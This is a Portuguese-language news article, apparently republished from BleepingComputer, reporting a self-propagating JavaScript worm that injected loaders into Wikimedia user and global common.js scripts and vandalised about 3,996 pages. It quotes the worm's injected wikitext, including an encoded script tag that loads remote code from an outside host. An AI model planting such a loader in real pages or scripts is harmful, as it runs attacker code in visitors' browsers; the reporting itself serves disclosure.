🔥 Fique por dentro das novidades mais quentes do momento! 🔥

A notícia que você procurava está aqui!

Apoie esse projeto de divulgacao de noticias! Clique aqui
A Wikimedia Foundation sofreu um incidente de segurança hoje, depois que um worm JavaScript de autopropagação começou a vandalizar páginas e a modificar scripts de usuários em vários wikis.

Os editores relataram o incidente pela primeira vez no Village Pump (técnico) da Wikipedia, onde os usuários notaram um grande número de edições automatizadas adicionando scripts ocultos e vandalismo a páginas aleatórias.

Os engenheiros da Wikimedia restringiram temporariamente a edição dos projetos enquanto investigavam o ataque e começavam a reverter as alterações.

O verme JavaScript

De acordo com o rastreador de problemas Phabricator da Wikimedia, parece que o incidente começou depois que um script malicioso hospedado na Wikipédia russa foi executado, fazendo com que um script JavaScript global na Wikipédia fosse modificado com código malicioso.

O script malicioso foi armazenado em User:Ololoshka562/test.js [Archive], carregado pela primeira vez em março de 2024 e supostamente associado a scripts usados ​​em ataques anteriores a projetos wiki.

Com base nos históricos de edição revisados ​​pelo BleepingComputer, acredita-se que o script tenha sido executado pela primeira vez por uma conta de funcionário da Wikimedia hoje cedo, enquanto testava a funcionalidade do script do usuário. Atualmente não se sabe se o script foi executado intencionalmente, carregado acidentalmente durante o teste ou acionado por uma conta comprometida.

A análise do BleepingComputer do script test.js arquivado mostra que ele se autopropaga injetando carregadores JavaScript maliciosos no common.js de um usuário logado e no MediaWiki:Common.js global da Wikipedia, que é usado por todos.

O MediaWiki permite arquivos JavaScript globais e específicos do usuário, como MediaWiki:Common.js e User:/common.js, que são executados nos navegadores dos editores para personalizar a interface do wiki.

Depois que o script test.js inicial foi carregado no navegador de um editor conectado, ele tentou modificar dois scripts usando a sessão e os privilégios desse editor:

Persistência no nível do usuário: tentou substituir User:/common.js por um carregador que carregaria automaticamente o script test.js sempre que o usuário navegasse no wiki enquanto estivesse logado.

Persistência em todo o site: se o usuário tivesse os privilégios corretos, ele também editaria o script global MediaWiki:Common.js, para que fosse executado para todos os editores que usam o script global.

Código para injetar um worm JavaScript de autopropagação no script MediaWiki:Common.jsFonte: BleepingComputer

Se o script global fosse modificado com sucesso, qualquer pessoa que o carregasse executaria automaticamente o carregador, que então repetiria as mesmas etapas, inclusive infectando seu próprio common.js, conforme mostrado abaixo.

Script common.js infectado de um usuário da WikimediaFonte: BleepingComputer

O script também inclui funcionalidade para editar uma página aleatória, solicitando uma por meio do comando Special:Random wiki e, em seguida, editando a página para inserir uma imagem e o seguinte carregador de JavaScript oculto.



[[Arquivo: Pica-pau10.jpg|5000px]]



[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]



De acordo com a análise do BleepingComputer, aproximadamente 3.996 páginas foram modificadas e cerca de 85 usuários tiveram seus arquivos common.js substituídos durante o incidente de segurança. Não se sabe quantas páginas foram excluídas.

Páginas modificadas pelo worm JavaScriptFonte: BleepingComputer

À medida que o worm se espalhava, os engenheiros restringiram temporariamente a edição nos projetos, revertendo as alterações maliciosas e removendo referências aos scripts injetados.

Durante a limpeza, os membros da equipe da Wikimedia Foundation também reverteram o common.js para vários usuários da plataforma. Estas páginas modificadas foram agora "suprimidas" e não são mais visíveis nos históricos de alterações.

No momento em que este artigo foi escrito, o código injetado foi removido e a edição é novamente possível.

No entanto, a Wikimedia ainda não publicou um relatório pós-incidente detalhado explicando exatamente como o script inativo foi executado ou quão amplamente o worm se propagou antes de ser contido.

BleepingComputer contatou a Wikimedia com perguntas sobre o incidente, mas não recebeu resposta até o momento.







Red Report 2026: Por que a criptografia de ransomware caiu 38%

O malware está ficando mais inteligente. O Red Report 2026 revela como novas ameaças usam matemática para detectar sandboxes e se esconder à vista de todos. Baixe nossa análise de 1,1 milhão de amostras maliciosas para descobrir as 10 principais técnicas e ver se sua pilha de segurança está cega.

Baixe o relatório



Siga Canal Fsociety para mais novidades:
Instagram | Facebook | Telegram | Twitter
#samirnews #samir #news #boletimtec #wikipédia #atingida #por #worm #javascript #de #autopropagação #que #vandalizou #páginas
💡 Compartilhe e ajude nosso projeto a crescer!

Post a Comment